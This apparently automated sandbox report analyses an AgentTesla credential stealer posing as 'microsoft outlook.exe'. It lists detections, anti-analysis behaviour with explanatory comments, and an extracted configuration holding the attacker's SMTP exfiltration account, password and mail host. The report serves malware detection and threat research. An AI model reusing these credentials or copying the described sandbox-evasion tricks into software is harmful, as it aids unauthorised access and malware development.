Windows Analysis Report: microsoft outlook.exe

Overview

General Information

Sample Name: microsoft outlook.exe
Analysis ID: 553252
MD5: 483994a69d86ec2e58ff6468cf049f89
SHA1: 36b1d5e58de9734faa40fe218e415c57e902292e
SHA256: a51cdfc1b836895069dc0e2d8b7e15e13c65714d44278add6ab306061cdbc0c8
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • microsoft outlook.exe (PID: 6888 cmdline: "C:\Users\user\Desktop\microsoft outlook.exe" MD5: 483994A69D86EC2E58FF6468CF049F89)
    • microsoft outlook.exe (PID: 1752 cmdline: "C:\Users\user\Desktop\microsoft outlook.exe" MD5: 483994A69D86EC2E58FF6468CF049F89)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "castilloo@cgyasc.com", "Password": "Castle1", "Host": "mail.cgyasc.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(17 entries in total; first 5 shown)

Unpacked PEs

Source | Rule | Description | Author
3.0.microsoft outlook.exe.415058.12.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
3.0.microsoft outlook.exe.415058.12.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
3.0.microsoft outlook.exe.400000.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
3.0.microsoft outlook.exe.400000.7.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
3.2.microsoft outlook.exe.4950000.4.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(61 entries in total; first 5 shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 3.2.microsoft outlook.exe.3515530.3.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "castilloo@cgyasc.com", "Password": "Castle1", "Host": "mail.cgyasc.com"}
Multi AV Scanner detection for submitted file
Source: microsoft outlook.exe | Virustotal: Detection: 55%
Antivirus / Scanner detection for submitted sample
Source: microsoft outlook.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | Avira: detection malicious, Label: TR/Injector.wiefs
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | Metadefender: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll | ReversingLabs: Detection: 81%
Source: 3.0.microsoft outlook.exe.400000.11.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.9.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.7.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.2.microsoft outlook.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.1.microsoft outlook.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.5.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.microsoft outlook.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.2.microsoft outlook.exe.49a0000.5.unpack | Avira: Label: TR/Spy.Gen8
Source: microsoft outlook.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: microsoft outlook.exe, 00000001.00000003.297741302.00000000029C0000.00000004.00000001.sdmp, microsoft outlook.exe, 00000001.00000003.291786394.0000000002B50000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00404A29 FindFirstFileExW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49814 -> 192.185.25.212:587
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | String found in binary or memory: http://YcxkAh.com
Source: microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp | String found in binary or memory: http://cgyasc.com
Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000003.505431063.00000000005E4000.00000004.00000001.sdmp | String found in binary or memory: http://d8P2A6TrVo.net
Source: microsoft outlook.exe, 00000003.00000002.560904754.0000000002863000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.560924455.0000000002868000.00000004.00000001.sdmp | String found in binary or memory: http://mail.cgyasc.com
Source: microsoft outlook.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: microsoft outlook.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: microsoft outlook.exe, microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: microsoft outlook.exe, 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | DNS traffic detected: queries for: mail.cgyasc.com
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file
Source: C:\Users\user\Desktop\microsoft outlook.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary:

.NET source code contains very large array initializations
Source: 3.2.microsoft outlook.exe.49a0000.5.unpack, <PrivateImplementationDetails>{2E0BCB56-1BBB-423C-8F51-94A15D000FB6}/C7FAB55B-2018-4C8A-B9C4-BB5765976361.cs | Large array initialization: .cctor: array initializer size 11982
Source: microsoft outlook.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00406043
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00404618
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_0040681A
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1324
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7524
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D8326
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D173E
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1D00
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7903
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2F5300
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D151E
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1B1A
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7B11
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7D10
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1565
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7567
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7762
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D3847
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D777F
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1D7B
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1773
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1D48
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1359
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D2354
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1B50
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D73A8
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D6E9A
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D19A4
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1FA4
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2DC26F
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D17A0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7BA0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D85B5
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1DB4
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D219E
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1B91
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7D92
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7BE3
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D17FD
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D69FD
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D15FF
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1BF2
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D15C9
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7FCB
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D19DE
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7DDE
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D17D1
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1BD2
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D5F3C
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D9684
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D763F
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1639
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1405
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7401
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D201D
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FCA16
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D8411
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7C10
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1A65
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D2A72
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1CAE
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2DB220
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D78B5
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D5849
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1E8C
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D228F
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D8280
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D849A
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D7A95
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1891
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D8293
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D6E92
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D1EE0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D84F9
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D5689
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D20F5
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D6F4C
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D18C5
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D14C0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D16DF
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0040A2A5
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_008351C0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0083B448
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_008368E0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0085E004
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00850068
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0085AD98
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0085C650
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00855718
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00856E38
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_022F47A0
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_022FF738
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_022F46B0
Source: microsoft outlook.exe, 00000001.00000003.291108170.0000000002AD6000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000001.00000003.299390193.0000000002C6F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs microsoft outlook.exe
Source: microsoft outlook.exe | Binary or memory string: OriginalFilename vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000002.557857953.0000000000199000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
Source: microsoft outlook.exe, 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameKPtHjBhBpIsMIgDrnnRFYHUEZfvUGBdFnZMeBP.exe4 vs microsoft outlook.exe
Source: microsoft outlook.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microsoft outlook.exe | Virustotal: Detection: 55%
Source: C:\Users\user\Desktop\microsoft outlook.exe | File read: C:\Users\user\Desktop\microsoft outlook.exe
Source: microsoft outlook.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe"
Source: C:\Users\user\Desktop\microsoft outlook.exe | Process created: C:\Users\user\Desktop\microsoft outlook.exe "C:\Users\user\Desktop\microsoft outlook.exe" (2 identical entries)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\microsoft outlook.exe | File created: C:\Users\user\AppData\Local\Temp\nsr49FD.tmp
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@3/3@2/1
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,
Source: C:\Users\user\Desktop\microsoft outlook.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
Source: 3.2.microsoft outlook.exe.49a0000.5.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (2 identical entries)
Source: C:\Users\user\Desktop\microsoft outlook.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 identical entries)
Source: C:\Users\user\Desktop\microsoft outlook.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\microsoft outlook.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2D6AD3 pushfd ; retf 0000h
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00401F16 push ecx; ret
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: microsoft outlook.exe | Static PE information: real checksum: 0x0 should be: 0x9cc38
Source: wbyrs.dll.1.dr | Static PE information: real checksum: 0x3550e should be: 0x3b412
Source: C:\Users\user\Desktop\microsoft outlook.exe | File created: C:\Users\user\AppData\Local\Temp\nsm4A2D.tmp\wbyrs.dll
Source: C:\Users\user\Desktop\microsoft outlook.exe | Process information set: NOOPENFILEERRORBOX (this event is recorded 60 times in the report; SetErrorMode with SEM_NOOPENFILEERRORBOX suppresses the "file not found" dialog, so a missing DLL fails silently instead of stalling execution behind a message box)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 6936 | Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 7000 | Thread sleep count: 2268 > 30
Source: C:\Users\user\Desktop\microsoft outlook.exe TID: 7000 | Thread sleep count: 7579 > 30
Source: C:\Users\user\Desktop\microsoft outlook.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\microsoft outlook.exe | Window / User API: threadDelayed 2268
Source: C:\Users\user\Desktop\microsoft outlook.exe | Window / User API: threadDelayed 7579
(922337203685477 ms is TimeSpan.MaxValue expressed in milliseconds, i.e. the thread was parked indefinitely. The short-sleep loops on TID 7000, 2268 and 7579 iterations, cover the case where a sandbox fast-forwards a single long sleep; either way the aim is to outlast the analysis window.)
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\microsoft outlook.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\microsoft outlook.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_00404A29 FindFirstFileExW,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\microsoft outlook.exe | API call chain: ExitProcess graph end node (recorded 3 times)
Source: microsoft outlook.exe, 00000003.00000003.522728351.0000000005A7E000.00000004.00000001.sdmp, microsoft outlook.exe, 00000003.00000002.562236559.0000000005A70000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
("Hyper-V RAW" is the display name of the Winsock AF_HYPERV protocol provider that ships in mswsock.dll on Windows 10, so the string turns up in any process that initialised Winsock; on its own it is weak evidence of VM detection.)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_004067FE GetProcessHeap,
Source: C:\Users\user\Desktop\microsoft outlook.exe | Process token adjusted: Debug (enables SeDebugPrivilege, which lets the process open handles to processes it does not own)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FC402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FC706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FC744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FC616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 1_2_6F2FC6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\microsoft outlook.exe | Code function: 3_2_004035F1 mov eax, dword ptr fs:[00000030h]
(fs:[30h] is the PEB pointer in the 32-bit TEB; these reads are the GetPEB step of the evasive chain above. The 1_2_6F2Fxxxx addresses place five of them in a module mapped at 0x6F2F0000 in process 1, not in the main image at 0x400000.)
Source: C:\Users\user\Desktop\microsoft outlook.exe | Memory allocated: page read and write | page guard
